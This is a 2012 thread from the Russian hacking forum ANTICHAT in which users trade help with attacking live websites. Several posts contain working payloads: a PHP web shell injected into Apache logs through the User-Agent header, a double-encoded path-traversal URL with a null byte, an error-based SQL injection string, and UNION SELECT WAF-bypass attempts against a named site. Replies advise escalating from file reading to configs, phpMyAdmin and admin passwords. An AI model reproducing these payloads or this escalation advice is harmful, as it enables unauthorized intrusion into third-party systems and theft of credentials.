ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.07.2012, 03:21
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
gateout
>new PDO
Это создание нового объекта. Смотри функцию getVar.
>php-получается не исполняется
Уверен, что у тебя инклуд, а не обычное чтение файлов?
|
|
|
16.07.2012, 09:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
9919
Репутация:
0
|
|
в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.
вот сама xss |
|
|
|
16.07.2012, 09:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от gateout
gateout said:
на сайт в логи apache засунул через User-agent
'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252F_c ustom.log%2500.jpg
и вижу содержимое лог файла включая
91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
Но php-получается не исполняется. Что делать?
Ты спалил URL
Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.
|
|
|
|
16.07.2012, 10:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
5208
Репутация:
0
|
|
Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.
|
|
|
|
16.07.2012, 13:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
6871
Репутация:
-3
|
|
Подскажите что можно сделать при найденном sql выдало ошибку:
Код:
Code:
Script: /index.php
Line: 138
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key'
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''
|
|
|
|
16.07.2012, 13:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от ex'pert
ex'pert said:
Подскажите что можно сделать при найденном sql
Взломать!
|
|
|
|
16.07.2012, 13:30
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от ex'pert
ex'pert said:
Подскажите что можно сделать при найденном sql выдало ошибку:
Код:
Code:
Script: /index.php
Line: 138
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key'
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''
Сообщение от OxoTnik
OxoTnik said:
Взломать!
Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))
|
|
|
|
16.07.2012, 18:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
5208
Репутация:
0
|
|
phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?
|
|
|
|
16.07.2012, 19:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от gateout
gateout said:
phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?
Читай сорцы двига, ищи еще баги
|
|
|
|
16.07.2012, 20:02
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Не могу обойти WAF...
Сообщение от None
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1+un/**/ion+sel/**/ect+1,2,3,4,5,6,7,8,9,10,11,12,13--
- OK но не выводит
Сообщение от None
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1/*UnIoN*/union/*SeLecT*/select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
- 403
Сообщение от None
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=999999.-999+1+union+%28select+1,2,3,4,5,6,7,8,9,10,11,12,1 3%29--+
- OK но не выводит
Вопрос: как обойти? |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
